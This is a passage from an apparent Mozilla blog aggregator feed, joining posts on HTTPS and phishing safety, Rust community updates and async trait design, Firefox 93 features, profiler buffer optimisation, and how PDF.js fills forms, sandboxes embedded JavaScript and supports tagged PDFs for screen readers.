If you get an email that says your bank account is frozen / your PayPal account has a discrepancy / you have an unpaid invoice / you get the idea, and it seems legitimate, go directly to the source. Do not click the link in the email, no matter how convinced you are.

Stop for alerts.

Firefox has a built-in Phishing and Malware Protection feature that will warn you when a page you visit has been flagged as a bad actor. If you see an alert, which looks like this, click the “Get me out of here!” button.

HTTPS matters

Most major websites that offer a customer login already use HTTPS. Think: financial institutions, media outlets, stores, social media. But it’s not universal. Every website out there doesn’t automatically use HTTPS.

With HTTPS-Only Mode in Firefox, the browser forces all connections to websites to use HTTPS. Enabling this mode provides a guarantee that all of your connections to websites are upgraded to use HTTPS and hence secure. Some websites only support HTTP and the connection cannot be upgraded. If HTTPS-Only Mode is enabled and a HTTPS version of a site is not available, you will see a “Secure Connection Not Available” page. If you click Continue to HTTP Site, you accept the risk and then will visit a HTTP version of the site. HTTPS-Only Mode will be turned off temporarily for that site.

It’s not difficult for sites to convert. The website owner needs to get a certificate from a certificate authority to enable HTTPS. In December 2015, Mozilla joined with Cisco, Akamai, EFF and University of Michigan to launch Let’s Encrypt, a free, automated, and open certificate authority, run for the public’s benefit.

HTTPS across the web is good for Internet Health because it makes a more secure environment for everyone. It provides integrity, so a site can’t be modified, and authentication, so users know they’re connecting to the legit site and not some attacker. Lacking any one of these three properties can cause problems. More non-secure sites means more risk for the overall web.

If you come across a website that is not using HTTPS, send them a note encouraging them to get on board. Post on their social media or send them an email to let them know it matters: @favoritesite I love your site, but I noticed it’s not secure. Get HTTPS from @letsencrypt to protect your site and visitors. If you operate a website, encrypting your site will make your it more secure for yourself and your visitors and contribute to the security of the web in the process.

In the meantime, share this article with your friends so they understand what HTTPS does and doesn’t do for their online security.

The post HTTPS and your online security appeared first on The Mozilla Blog.

Niko MatsakisCTCFT 2021-10-18 Agenda

The next “Cross Team Collaboration Fun Times” (CTCFT) meeting will take place next Monday, on 2021-10-18 (in your time zone)! This post covers the agenda. You’ll find the full details (along with a calendar event, zoom details, etc) on the CTCFT website.

Agenda

The theme for this meeting is exploring ways to empower and organize contributors.

  • (5 min) Opening remarks 👋 (nikomatsakis)
  • (5 min) CTCFT update (angelonfira)
  • (20 min) Sprints and groups implementing the async vision doc (tmandry)
  • (15 min) rust-analyzer talk (TBD)
    • The rust-analyzer project aims to succeed RLS as the official language server for Rust. We talk about how it differs from RLS, how it is developed, and what to expect in the future.
  • (10 min) Contributor survey (yaahc)
    • Introducing the contributor survey, it’s goals, methodology, and soliciting community feedback
  • (5 min) Closing (nikomatsakis)

Afterwards: Social hour

After the CTCFT this week, we are going to try an experimental social hour. The hour will be coordinated in the #ctcft stream of the rust-lang Zulip. The idea is to create breakout rooms where people can gather to talk, hack together, or just chill.

This Week In RustThis Week in Rust 412

Hello and welcome to another issue of This Week in Rust! Rust is a programming language empowering everyone to build reliable and efficient software. This is a weekly summary of its progress and community. Want something mentioned? Tweet us at @ThisWeekInRust or send us a pull request. Want to get involved? We love contributions.

This Week in Rust is openly developed on GitHub. If you find any errors in this week's issue, please submit a PR.

Updates from Rust Community

Official
Project/Tooling Updates
Newsletters
Observations/Thoughts
Rust Walkthroughs

Crate of the Week

This week's crate is flutter_rust_bridge, a memory-safe binding generator for Flutter/Dart ↔ Rust.

Thanks to fzyzcjy for the suggestion!

Please submit your suggestions and votes for next week!

Call for Participation

Always wanted to contribute to open-source projects but didn't know where to start? Every week we highlight some tasks from the Rust community for you to pick and get started!

Some of these tasks may also have mentors available, visit the task page for more information.

If you are a Rust project owner and are looking for contributors, please submit tasks here.

Updates from the Rust Project

353 pull requests were merged in the last week

Rust Compiler Performance Triage

A relatively quiet week: two smallish regressions, and one largish regression that is isolated to doc builds. A couple of nice small wins as well.

Triage done by @pnkfelix. Revision range: 25ec82..9475e6

2 Regressions, 2 Improvements, 2 Mixed; 1 of them in rollups 42 comparisons made in total

Full report here

Approved RFCs

Changes to Rust follow the Rust RFC (request for comments) process. These are the RFCs that were approved for implementation this week:

No RFCs were approved this week.

Final Comment Period

Every week the team announces the 'final comment period' for RFCs and key PRs which are reaching a decision. Express your opinions now.

RFCs

No RFCs are currently in the final comment period.

Tracking Issues & PRs
New RFCs

No new RFCs were proposed this week.

Upcoming Events

Online
North America

If you are running a Rust event please add it to the calendar to get it mentioned here. Please remember to add a link to the event too. Email the Rust Community Team for access.

Rust Jobs

System 76

Enso

Second Spectrum

Tweet us at @ThisWeekInRust to get your job offers listed here!

Quote of the Week

Rust is the language where you get the hangover first.

unattributed via Niko Matsakis' RustConf keynote

Thanks to Alice Ryhl for the suggestion!

Please submit quotes and vote for next week!

This Week in Rust is edited by: nellshamrell, llogiq, and cdmistman.

Discuss on r/rust

Mozilla Performance BlogPerformance Sheriff Newsletter (August 2021)

In August there were 126 alerts generated, resulting in 16 regression bugs being filed on average 3.6 days after the regressing change landed.

Welcome to the August 2021 edition of the performance sheriffing newsletter. Here you’ll find the usual summary of our sheriffing efficiency metrics. If you’re interested (and if you have access) you can view the full dashboard.

Sheriffing efficiency

  • All alerts were triaged in an average of 0.8 days
  • 99% of alerts were triaged within 3 days
  • Valid regressions were associated with bugs in an average of 1.6 days
  • 86% of valid regressions were associated with bugs within 5 days

Sheriffing Efficiency (August 2021)

Summary of alerts

Each month I’ll highlight the regressions and improvements found.

Note that whilst I usually allow one week to pass before generating the report, there are still alerts under investigation for the period covered in this article. This means that whilst I believe these metrics to be accurate at the time of writing, some of them may change over time.

I would love to hear your feedback on this article, the queries, the dashboard, or anything else related to performance sheriffing or performance testing. You can comment here, or find the team on Matrix in #perftest or #perfsheriffs.

The dashboard for August can be found here (for those with access).

The Talospace ProjectFirefox 93 on POWER

Firefox 93 is out, though because of inopportune scheduling at my workplace I haven't had much time to do much of anything other than $DAYJOB for the past week or so. (Cue Bill Lumbergh.) Chief amongst its features is AVIF image support (from the AV1 codec), additional PDF forms support, blocking HTTP downloads from HTTPS sites, new DOM/CSS/HTML support (including datetime-local), and most controversially Firefox Suggest, which I personally disabled since it gets in the way. I appreciate Mozilla trying to diversify its income streams, but I'd rather we could just donate directly to the browser's development rather than generally to Mozilla.

At any rate, a slight tweak was required to the LTO-PGO patch but otherwise the browser runs and functions normally using the same .mozconfigs from Firefox 90. Once I get through the next couple weeks hopefully I'll have more free time for JIT work, but you can still help.

Andrew HalberstadtTaskgraph Diff

Introducing taskgraph --diff to help validate your task configuration changes.

Hacks.Mozilla.OrgLots to see in Firefox 93!

Firefox 93 comes with lots of lovely updates including AVIF image format support, filling of XFA-based forms in its PDF viewer and protection against insecure downloads by blocking downloads relying on insecure connections.

Web developers are now able to use static initialization blocks within JavaScript classes, and there are some Shadow DOM and Custom Elements updates. The SHA-256 algorithm is now supported for HTTP Authentication using digests. This allows much more secure authentication than previously available using the MD5 algorithm.

This blog post provides merely a set of highlights; for all the details, check out the following:

AVIF Image Support

The AV1 Image File Format (AVIF) is a powerful, open source, royalty-free file format. AVIF has the potential to become the “next big thing” for sharing images in web content. It offers state-of-the-art features and performance, without the encumbrance of complicated licensing and patent royalties that have hampered comparable alternatives.

It offers much better lossless compression compared to PNG or JPEG formats, with support for higher color depths and transparency. As support is not yet comprehensive, you should include fallbacks to formats with better browser support (i.e. using the <picture> element).

Read more about the AVIF image format in the Image file type and format guide on MDN.

Static initialization blocks

Support for static initialization blocks in JavaScript classes is now available in Firefox 93. This enables more flexibility as it allows developers to run blocks of code when initializing static fields. This is handy if you want to set multiple fields from a single value or evaluate statements.

You can have multiple static blocks within a class and they come with their own scope. As they are declared within a class, they have access to a class’s private fields. You can find more information about static initialization blocks on MDN.

Custom Elements & Shadow DOM

In Firefox 92 the Imperative Slotting API was implemented giving developers more control over assigning slots within a custom element. Firefox 93 included support for the slotchange event that fires when the nodes within a slot change.

Also implemented in Firefox 93 is the HTMLElement.attachInternals() method. This returns an instance of ElementInternals, allowing control over an HTML element’s internal features. The ElementInternals.shadowRoot property was also added, meaning developers can gain access to the shadow root of elements, even if they themselves didn’t create the element.

If you want to learn more about Custom Elements and the Shadow DOM, check out MDN’s guides on the topics.

Other highlights

A few other features worth noting include:

The post Lots to see in Firefox 93! appeared first on Mozilla Hacks - the Web developer blog.

Mozilla Performance BlogReducing the Overhead of Profiling Firefox Sleeping Threads

The Firefox Profiler and its overhead

Firefox includes its own profiler: Visit profiler.firefox.com to enable it, and the user documentation is available from there.

The main advantages compared with using a third-party profiler, are that it’s supplied with Firefox, it can capture screenshots, it understands JavaScript stacks, and Firefox is adding “markers” to indicate important events that may be useful to developers.

Its most visible function is to capture periodic “samples” of function call stacks from a number of threads in each process. Threads are selected during configuration in about:profiling, and can range from a handful of the most important threads, to all known threads.

This sampling is performed at regular intervals, by going through all selected threads and suspending each one temporarily while a sample of its current stack is captured (this is known as “stack walking”). This costly sampling operation can have a non-negligible impact on how the rest of the Firefox code runs, this is the “overhead” of the Profiler. In order to be able to sample as many threads as possible with the smallest impact, there is ongoing work to reduce this overhead.

Potential for optimization: Sleeping threads

One consideration is that most of the time, a large number of threads are not actually running, either because there is no work to be done (the user may not be interacting with Firefox), or because a thread may be waiting for the operating system to finish some long operation, like reading a file.

There are currently two ways to determine whether a thread can be considered “asleep”:

  • In the Firefox code, there are instructions like AUTO_PROFILER_THREAD_SLEEP, which indicate that a portion of code will be performing a small amount of work for an unknown duration that could stretch indefinitely. The most common situation is waiting for a condition variable to be signaled, for example when a task queue is waiting for a new task to be added, this addition may happen any time soon, or far into the future.
  • More recently, CPU utilization measurements were added to the Profiler. It is now possible to know if any activity happened since the previous sample; If it’s zero, we know for sure that the thread must be at the exact same spot as before, without needing to instrument the Firefox code.

For example, in the following screenshot of a profile, the “SwComposite” thread spends all its time waiting for an event. All 555 stack samples are exactly the same. Notice that the CPU utilization graph (in the top blue row) is not visible because it’s at zero.

Profile showing a sleeping thread where all samples are identical

Original optimization: Copy the previous sample

Once we know that a thread is effectively idle, we only need to capture one sample representative of this period, and then this sample may be simply copied, as long as the thread stays asleep. This was implemented back in 2014.

Diagram: Buffer with one sample from stack sampling, followed by 3 copies

The important advantage here is that threads don’t need to be actively suspended and sampled, which takes much more time.

However, performing this copy still does take some time, and also the same space as before in the profile buffer.

New optimization: Refer to the previous sample

Instead of copying a full stack, the profiler now uses a much smaller entry indicating that this sample is exactly the same as the previous one. As a rough estimate, stack traces take around 300 bytes on average. The new “same as before” entry takes less than 30 bytes, a 10 times improvement!

Diagram: Buffer with one sample, followed by the small '=' entries

This may seem so obvious and simple, why wasn’t it done from the start, all those years ago?

Problem: Old samples get discarded

The profiler only has a finite amount of memory available to store its data while profiling, otherwise it would eventually use up all of the computer’s memory if we let it run long enough! So after some time, the profiler starts to drop the oldest data, assuming that the last part of the profiling session is usually the most important to keep.

In this case, imagine that one thread stays asleep for the whole duration of the profiling session. Its stack was captured once at the beginning, but after that it was copied again and again. This worked because even if we dropped old samples, we would still have full (copied) samples in the buffer.

Diagram: Buffer with 4 copies of a sample, the first two have been discarded, two full samples remain

But now that we use a special entry that only says “same as before”, we run the risk that the initial full stack gets dropped, and at the end we wouldn’t be able to reconstruct the identical samples for that sleeping thread!

Diagram: Buffer with one sample and 3 '=' entries, sample has been discarded, '=' entries don't know what they refer to anymore!

How can we ensure that we always keep samples for our sleeping threads?

Clue: Data is stored in chunks

An important detail of the profiler’s current implementation, is that instead of a traditional circular buffer, it uses “chunks” to store its data. A chunk is a memory buffer of a certain size, and we use a sequence of them to store the whole profile.

When a chunk becomes full, a new chunk is created and can store more data. After some time, the total size of all chunks in Firefox reaches a user-settable limit, at which point the oldest chunk is discarded — in practice it may be recycled for the next time a new chunk is needed, this removes some expensive memory allocation and de-allocation operations.

Thanks to this, we know that data is always removed chunk-by-chunk, so if one entry in a chunk refers to a previous entry in the same chunk, both entries are guaranteed to be present at the end, or both entries would have been discarded at the same time.

Solution: Keep at least one full sample per chunk

Finally, the solution to our problem becomes possible: Ensure that a full sample is always present in each chunk. How is that achieved, and why does it work?

During profiling, when the profiler is ready to store a “same as before” entry, it can check if the previous complete sample is in the same chunk, and if not, it will make a full copy of the stack from the previous chunk (there is a guarantee that the immediately-previous chunk cannot be discarded).

At the end of the profiling session, whichever chunk is first (the real first one, or the oldest one that still remains), it will always include a full sample, and the subsequent “same as before” entries will therefore have access to a full sample that can be copied.

Diagram with 2 buffer chunks, each has one sample and some '=' entries; when first chunk is discarded, the 2nd chunk is still readable.

Conclusion

In practice this optimization resulted in allowing around 50% more data to fit in profile buffers (because lots of samples now take a tiny space), and periodic sampling takes around 7 times less work than before (because we don’t need to find the old sample and copy it anymore).

This work was tracked in Bugzilla task 1633572, and landed on 2021-08-18 in Firefox 93, released on 2021-10-05. Thanks to my colleague Nazım Can Altınova for the code reviews.

It would theoretically be possible to further optimize sleeping thread sampling, but with diminishing returns. For example:

  • During profiling, a copy of the last sample could be kept outside of the chunked buffer, and then when necessary (at the end of the profiling session, or if the thread stops sleeping) that outside sample could be copied into the buffer, so it would be available when outputting sleeping samples. However this feels like even more complex work, and the potential space gains (by not having a full sample in each chunk) would be relatively small.
  • Instead of recording a “same as before” entry for each thread, we could skip all sleeping threads and only record one entry at the end of the sampling loop, meaning that any thread that didn’t get an explicit sample would be automatically considered asleep. This could give some useful savings when profiling many threads, because then it’s more likely that a large proportion would be asleep. This would probably be a fairly small space saving, but easy enough to implement that it could be worth it. To be continued!

If you have any questions, or would like to talk to the team, you can reach us in the “Firefox Profiler” room on chat.mozilla.org.

Niko MatsakisDyn async traits, part 4

In the previous post, I talked about how we could write our own impl Iterator for dyn Iterator by adding a few primitives. In this post, I want to look at what it would take to extend that to an async iterator trait. As before, I am interested in exploring the “core capabilities” that would be needed to make everything work.

Start somewhere: Just assume we want Box

In the first post of this series, we talked about how invoking an async fn through a dyn trait should to have the return type of that async fn be a Box<dyn Future> — but only when calling it through a dyn type, not all the time.

Actually, that’s a slight simplification: Box<dyn Future> is certainly one type we could use, but there are other types you might want:

  • Box<dyn Future + Send>, to indicate that the future is sendable across threads;
  • Some other wrapper type besides Box.

To keep things simple, I’m just going to look at Box<dyn Future> in this post. We’ll come back to some of those extensions later.

Background: Running example

Let’s start by recalling the AsyncIter trait:

trait AsyncIter {
    type Item;

    async fn next(&mut self) -> Option<Self::Item>;
}

Remember that when we “desugared” this async fn, we introduced a new (generic) associated type for the future returned by next, called Next here:

trait AsyncIter {
    type Item;

    type Next<'me>: Future<Output = Self::Item> + 'me;
    fn next(&mut self) -> Self::Next<'_>;
}

We were working with a struct SleepyRange that implements AsyncIter:

struct SleepyRange {  }
impl AsyncIter for SleepyRange {
    type Item = u32;
    
}

Background: Associated types in a static vs dyn context

Using an associated type is great in a static context, because it means that when you call sleepy_range.next(), we are able to resolve the returned future type precisely. This helps us to allocate exactly as much stack as is needed and so forth.

But in a dynamic context, i.e. if you have some_iter: Box<dyn AsyncIter> and you invoke some_iter.next(), that’s a liability. The whole point of using dyn is that we don’t know exactly what implementation of AsyncIter::next we are invoking, so we can’t know exactly what future type is returned. Really, we just want to get back a Box<dyn Future<Output = Option<u32>>> — or something very similar.

How could we have a trait that boxes futures, but only when using dyn?

If we want the trait to only box futures when using dyn, there are two things we need.

First, we need to change the impl AsyncIter for dyn AsyncIter. In the compiler today, it generates an impl which is generic over the value of every associated type. But we want an impl that is generic over the value of the Item type, but which specifies the value of the Next type to be Box<dyn Future>. This way, we are effectively saying that “when you call the next method on a dyn AsyncIter, you always get a Box<dyn Future> back” (but when you call the next method on a specific type, such as a SleepyRange, you would get back a different type — the actual future type, not a boxed version). If we were to write that dyn impl in Rust code, it might look something like this:

impl<I> AsyncIter for dyn AsyncIter<Item = I> {
    type Item = I;

    type Next<'me> = Box<dyn Future<Output = Option<I>> + me>;
    fn next(&mut self) -> Self::Next<'_> {
        /* see below */
    }
}

The body of the next function is code that extracts the function pointer from the vtable and calls it. Something like this, relying on the APIs from [RFC 2580] along with the function associated_fn that I sketched in the previous post:

fn next(&mut self) -> Self::Next<_> {
    type RuntimeType = ();
    let data_pointer: *mut RuntimeType = self as *mut ();
    let vtable: DynMetadata = ptr::metadata(self);
    let fn_pointer: fn(*mut RuntimeType) -> Box<dyn Future<Output = Option<I>> + _> =
        associated_fn::<AsyncIter::next>();
    fn_pointer(data)
}

This is still the code we want. However, there is a slight wrinkle.

Constructing the vtable: Async functions need a shim to return a Box

In the next method above, the type of the function pointer that we extracted from the vtable was the following:

fn(*mut RuntimeType) -> Box<dyn Future<Output = Option<I>> + _>

However, the signature of the function in the impl is different! It doesn’t return a Box, it returns an impl Future! Somehow we have to bridge this gap. What we need is a kind of “shim function”, something like this:

fn next_box_shim<T: AsyncIter>(this: &mut T) -> Box<dyn Future<Output = Option<I>> + _> {
    let future: impl Future<Output = Option<I>> = AsyncIter::next(this);
    Box::new(future)
}

Now the vtable for SleepyRange can store next_box_shim::<SleepyRange> instead of storing <SleepyRange as AsyncIter>::next directly.

Extending the AssociatedFn trait

In my previous post, I sketched out the idea of an AssociatedFn trait that had an associated type FnPtr. If we wanted to make the construction of this sort of shim automated, we would want to change that from an associated type into its own trait. I’m imagining something like this:

trait AssociatedFn { }
trait Reify<F>: AssociatedFn {
    fn reify(self) -> F; 
}

where A: Reify<F> indicates that the associated function A can be “reified” (made into a function pointer) for a function type F. The compiler could implement this trait for the direct mapping where possible, but also for various kinds of shims and ABI transformations. For example, the AsyncIter::next method might implementReify<fn(*mut ()) -> Box<dyn Future<..>>> to allow a “boxing shim” to be constructed and so forth.

Other sorts of shims

There are other sorts of limitations around dyn traits that could be overcome with judicious use of shims and tweaked vtables, at least in some cases. As an example, consider this trait:

pub trait Append {
    fn append(&mut self, values: impl Iterator<Item = u32>);
}

This trait is not traditionally dyn-safe because the append function is generic and requires monomorphization for each kind of iterator — therefore, we don’t know which version to put in the vtable for Append, since we don’t yet know the types of iterators it will be applied to! But what if we just put one version, the case where the iterator type is &mut dyn Iterator<Item = u32>? We could then tweak the impl Append for dyn Append to create this &mut dyn Iterator and call the function from the vtable:

impl Append for dyn Append {
    fn append(&mut self, values: impl Iterator<Item = u32>) {
        let values_dyn: &mut dyn Iterator<Item = u32> = &values;
        type RuntimeType = ();
        let data_pointer: *mut RuntimeType = self as *mut ();
        let vtable: DynMetadata = ptr::metadata(self);
        let f = associated_fn::<Append::append>(vtable);
        f(data_pointer, values_dyn);
    }
}

Conclusion

So where does this leave us? The core building blocks for “dyn async traits” seem to be:

  • The ability to customize the contents of the vtable that gets generated for a trait.
    • For example, async fns need shim functions that box the output.
  • The ability to customize the dispatch logic (impl Foo for dyn Foo).
  • The ability to customize associated types like Next to be a Box<dyn>:
    • This requires the ability to extract the vtable, as given by [RFC 2580].
    • It also requires the ability to extract functions from the vtable (not presently supported).

I said at the outset that I was going to assume, for the purposes of this post, that we wanted to return a Box<dyn>, and I have. It seems possible to extend these core capabilities to other sorts of return types (such as other smart pointers), but it’s not entirely trivial; we’d have to define what kinds of shims the compiler can generate.

I haven’t really thought very hard about how we might allow users to specify each of those building blocks, though I sketched out some possibilities. At this point, I’m mostly trying to explore the possibilities of what kinds of capabilities may be useful or necessary to expose.

Hacks.Mozilla.OrgImplementing form filling and accessibility in the Firefox PDF viewer

Intro

Last year, during lockdown, many discovered the importance of PDF forms when having to deal remotely with administrations and large organizations like banks. Firefox supported displaying PDF forms, but it didn’t support filling them: users had to print them, fill them by hand, and scan them back to digital form. We decided it was time to reinvest in the PDF viewer (PDF.js) and support filling PDF forms within Firefox to make our users’ lives easier.

While we invested more time in the PDF viewer, we also went through the backlog of work and prioritized improving the accessibility of our PDF reader for users of assistive technologies. Below we’ll describe how we implemented the form support, improved accessibility, and made sure we had no regressions along the way.

Brief Summary of the PDF.js Architecture

Overview of the PDF.js ArchitectureTo understand how we added support for forms and tagged PDFs, it’s first important to understand some basics about how the PDF viewer (PDF.js) works in Firefox.

First, PDF.js will fetch and parse the document in a web worker. The parsed document will then generate drawing instructions. PDF.js sends them to the main thread and draws them on an HTML5 canvas element.

Besides the canvas, PDF.js potentially creates three more layers that are displayed on top of it. The first layer, the text layer, enables text selection and search. It contains span elements that are transparent and line up with the text drawn below them on the canvas. The other two layers are the Annotation/AcroForm layer and the XFA form layer. They support form filling and we will describe them in more detail below.

Filling Forms (AcroForms)

AcroForms are one of two types of forms that PDF supports, the most common type of form.

AcroForm structure

Within a PDF file, the form elements are stored in the annotation data. Annotations in PDF are separate elements from the main content of a document. They are often used for things like taking notes on a document or drawing on top of a document. AcroForm annotation elements support user input similar to HTML input e.g. text, check boxes, radio buttons.

AcroForm implementation

In PDF.js, we parse a PDF file and create the annotations in a web worker. Then, we send them out from the worker and render them in the main process using HTML elements inserted in a div (annotation layer). We render this annotation layer, composed of HTML elements, on top of the canvas layer.

The annotation layer works well for displaying the form elements in the browser, but it was not compatible with the way PDF.js supports printing. When printing a PDF, we draw its contents on a special printing canvas, insert it into the current document and send it to the printer. To support printing form elements with user input, we needed to draw them on the canvas.

By inspecting (with the help of the qpdf tool) the raw PDF data of forms saved using other tools, we discovered that we needed to save the appearance of a filled field by using some PDF drawing instructions, and that we could support both saving and printing with a common implementation.

To generate the field appearance, we needed to get the values entered by the user. We introduced an object called annotationStorage to store those values by using callback functions in the corresponding HTML elements. The annotationStorage is then passed to the worker when saving or printing, and the values for each annotation are used to create an appearance.

Example PDF.js Form Rendering

On top a filled form in Firefox and on bottom the printed PDF opened in Evince.

Safely Executing JavaScript within PDFs

Thanks to our Telemetry, we discovered that many forms contain and use embedded JavaScript code (yes, that’s a thing!).

JavaScript in PDFs can be used for many things, but is most commonly used to validate data entered by the user or automatically calculate formulas. For example, in this PDF, tax calculations are performed automatically starting from user input. Since this feature is common and helpful to users, we set out to implement it in PDF.js.

The alternatives

From the start of our JavaScript implementation, our main concern was security. We did not want PDF files to become a new vector for attacks. Embedded JS code must be executed when a PDF is loaded or on events generated by form elements (focus, input, …).

We investigated using the following:

  1. JS eval function
  2. JS engine compiled in WebAssembly with emscripten
  3. Firefox JS engine ComponentUtils.Sandbox

The first option, while simple, was immediately discarded since running untrusted code in eval is very unsafe.

Option two, using a JS engine compiled with WebAssembly, was a strong contender since it would work with the built-in Firefox PDF viewer and the version of PDF.js that can be used in regular websites. However, it would have been a large new attack surface to audit. It would have also considerably increased the size of PDF.js and it would have been slower.

The third option, sandboxes, is a feature exposed to privileged code in Firefox that allows JS execution in a special isolated environment. The sandbox is created with a null principal, which means that everything within the sandbox can only be accessed by it and can only access other things within the sandbox itself (and by privileged Firefox code).

Our final choice

We settled on using a ComponentUtils.Sandbox for the Firefox built-in viewer. ComponentUtils.Sandbox has been used for years now in WebExtensions, so this implementation is battle tested and very safe: executing a script from a PDF is at least as safe as executing one from a normal web page.

For the generic web viewer (where we can only use standard web APIs, so we know nothing about ComponentUtils.Sandbox) and the pdf.js test suite we used a WebAssembly version of QuickJS (see pdf.js.quickjs for details).

The implementation of the PDF sandbox in Firefox works as follows:

  • We collect all the fields and their properties (including the JS actions associated with them) and then clone them into the sandbox;
  • At build time, we generate a bundle with the JS code to implement the PDF JS API (totally different from the web API we are accustomed to!). We load it in the sandbox and then execute it with the data collected during the first step;
  • In the HTML representation of the fields we added callbacks to handle the events (focus, input, …). The callbacks simply dispatch them into the sandbox through an object containing the field identifier and linked parameters. We execute the corresponding JS actions in the sandbox using eval (it’s safe in this case: we’re in a sandbox). Then, we clone the result and dispatch it outside the sandbox to update the states in the HTML representations of the fields.

We decided not to implement the PDF APIs related to I/O (network, disk, …) to avoid any security concerns.

Yet Another Form Format: XFA

Our Telemetry also informed us that another type of PDF forms, XFA, was fairly common. This format has been removed from the official PDF specification, but many PDFs with XFA still exist and are viewed by our users so we decided to implement it as well.

The XFA format

The XFA format is very different from what is usually in PDF files. A normal PDF is typically a list of drawing commands with all layout statically defined by the PDF generator. However, XFA is much closer to HTML and has a more dynamic layout that the PDF viewer must generate. In reality XFA is a totally different format that was bolted on to PDF.

The XFA entry in a PDF contains multiple XML streams: the most important being the template and datasets. The template XML contains all the information required to render the form: it contains the UI elements (e.g. text fields, checkboxes, …) and containers (subform, draw, …) which can have static or dynamic layouts. The datasets XML contains all the data used by the form itself (e.g. text field content, checkbox state, …). All these data are bound into the template (before layout) to set the values of the different UI elements.

Example Template
<template xmlns="http://www.xfa.org/schema/xfa-template/3.6/">
  <subform>
    <pageSet name="ps">
      <pageArea name="page1" id="Page1">
        <contentArea x="7.62mm" y="30.48mm" w="200.66mm" h="226.06mm"/>
        <medium stock="default" short="215.9mm" long="279.4mm"/>
      </pageArea>
    </pageSet>
    <subform>
      <draw name="Text1" y="10mm" x="50mm" w="200mm" h="7mm">
        <font size="15pt" typeface="Helvetica"/>
        <value>
          <text>Hello XFA & PDF.js world !</text>
        </value>
      </ draw>
    </subform>
  </subform>
</template>
Output From Template

Rendering of XFA Document

The XFA implementation

In PDF.js we already had a pretty good XML parser to retrieve metadata about PDFs: it was a good start.

We decided to map every XML node to a JavaScript object, whose structure is used to validate the node (e.g. possible children and their different numbers). Once the XML is parsed and validated, the form data needs to be bound in the form template and some prototypes can be used with the help of SOM expressions (kind of XPath expressions).

The layout engine

In XFA, we can have different kinds of layouts and the final layout depends on the contents. We initially planned to piggyback on the Firefox layout engine, but we discovered that unfortunately we would need to lay everything out ourselves because XFA uses some layout features which don’t exist in Firefox. For example, when a container is overflowing the extra contents can be put in another container (often on a new page, but sometimes also in another subform).  Moreover, some template elements don’t have any dimensions, which must be inferred based on their contents.

In the end we implemented a custom layout engine: we traverse the template tree from top to bottom and, following layout rules, check if an element fits into the available space. If it doesn’t, we flush all the elements layed out so far into the current content area, and we move to the next one.

During layout, we convert all the XML elements into JavaScript objects with a tree structure. Then, we send them to the main process to be converted into HTML elements and placed in the XFA layer.

The missing font problem

As mentioned above, the dimensions of some elements are not specified. We must compute them ourselves based on the font used in them. This is even more challenging because sometimes fonts are not embedded in the PDF file.

Not embedding fonts in a PDF is considered bad practice, but in reality many PDFs do not include some well-known fonts (e.g. the ones shipped by Acrobat or Windows: Arial, Calibri, …) as PDF creators simply expected them to be always available.

To have our output more closely match Adobe Acrobat, we decided to ship the Liberation fonts and glyph widths of well-known fonts. We used the widths to rescale the glyph drawing to have compatible font substitutions for all the well-known fonts.

Comparing glyph rescaling

On the left: default font without glyph rescaling. On the right: Liberation font with glyph rescaling to emulate MyriadPro.

The result

In the end the result turned out quite good, for example, you can now open PDFs such as 5704 – APPLICATION FOR A FISH EXPORT LICENCE in Firefox 93!

Making PDFs accessible

What is a Tagged PDF?

Early versions of PDFs were not a friendly format for accessibility tools such as screen readers. This was mainly because within a document, all text on a page is more or less absolutely positioned and there’s not a notion of a logical structure such as paragraphs, headings or sentences. There was also no way to provide a text description of images or figures. For example, some pseudo code for how a PDF may draw text:

showText(“This”, 0 /*x*/, 60 /*y*/);
showText(“is”, 0, 40);
showText(“a”, 0, 20);
showText(“Heading!”, 0, 0);

This would draw text as four separate lines, but a screen reader would have no idea that they were all part of one heading. To help with accessibility, later versions of the PDF specification introduced “Tagged PDF.” This allowed PDFs to create a logical structure that screen readers could then use. One can think of this as a similar concept to an HTML hierarchy of DOM nodes. Using the example above, one could add tags:

beginTag(“heading 1”);
showText(“This”, 0 /*x*/, 60 /*y*/);
showText(“is”, 0, 40);
showText(“a”, 0, 20);
showText(“Heading!”, 0, 0);
endTag(“heading 1”);

With the extra tag information, a screen reader knows that all of the lines are part of “heading 1” and can read it in a more natural fashion. The structure also allows screen readers to easily navigate to different parts of the document.

The above example is only about text, but tagged PDFs support many more features than this e.g. alt text for images, table data, lists, etc.

How we supported Tagged PDFs in PDF.js

For tagged PDFs we leveraged the existing “text layer” and the browsers built in HTML ARIA accessibility features. We can easily see this by a simple PDF example with one heading and one paragraph. First, we generate the logical structure and insert it into the canvas:

<canvas id="page1">
  <!-- This content is not visible, 
  but available to screen readers   -->
  <span role="heading" aria-level="1" aria-owns="heading_id"></span>
  <span aria_owns="some_paragraph"></span>
</canvas>

In the text layer that overlays the canvas:

<div id="text_layer">
  <span id="heading_id">Some Heading</span>
  <span id="some_paragaph">Hello world!</span>
</div>

A screen reader would then walk the DOM accessibility tree in the canvas and use the `aria-owns` attributes to find the text content for each node. For the above example, a screen reader would announce:

Heading Level 1 Some Heading
Hello World!

For those not familiar with screen readers, having this extra structure also makes navigating around the PDF much easier: you can jump from heading to heading and read paragraphs without unneeded pauses.

Ensure there are no regressions at scale, meet reftests

Reference Test Analyzer

Crawling for PDFs

Over the past few months, we have built a web crawler to retrieve PDFs from the web and, using a set of heuristics, collect statistics about them (e.g. are they XFA? What fonts are they using? What formats of images do they include?).

We have also used the crawler with its heuristics to retrieve PDFs of interest from the “stressful PDF corpus” published by the PDF association, which proved particularly interesting as they contained many corner cases we did not think could exist.

With the crawler, we were able to build a large corpus of Tagged PDFs (around 32000), PDFs using JS (around 1900), XFA PDFs (around 1200) which we could use for manual and automated testing. Kudos to our QA team for going through so many PDFs! They now know everything about asking for a fishing license in Canada, life skills!

Reftests for the win

We did not only use the corpus for manual QA, but also added some of those PDFs to our list of reftests (reference tests).

A reftest is a test consisting of a test file and a reference file. The test file uses the pdf.js rendering engine, while the reference file doesn’t (to make sure it is consistent and can’t be affected by changes in the patch the test is validating). The reference file is simply a screenshot of the rendering of a given PDF from the “master” branch of pdf.js.

The reftest process

When a developer submits a change to the PDF.js repo, we run the reftests and ensure the rendering of the test file is exactly the same as the reference screenshot. If there are differences, we ensure that the differences are improvements rather than regressions.

After accepting and merging a change, we regenerate the references.

The reftest shortcomings

In some situations a test may have subtle differences in rendering compared to the reference due to, e.g., anti-aliasing. This introduces noise in the results, with “fake” regressions the developer and reviewer have to sift through. Sometimes, it is possible to miss real regressions because of the large number of differences to look at.

Another shortcoming of reftests is that they are often big. A regression in a reftest is not as easy to investigate as a failure of a unit test.

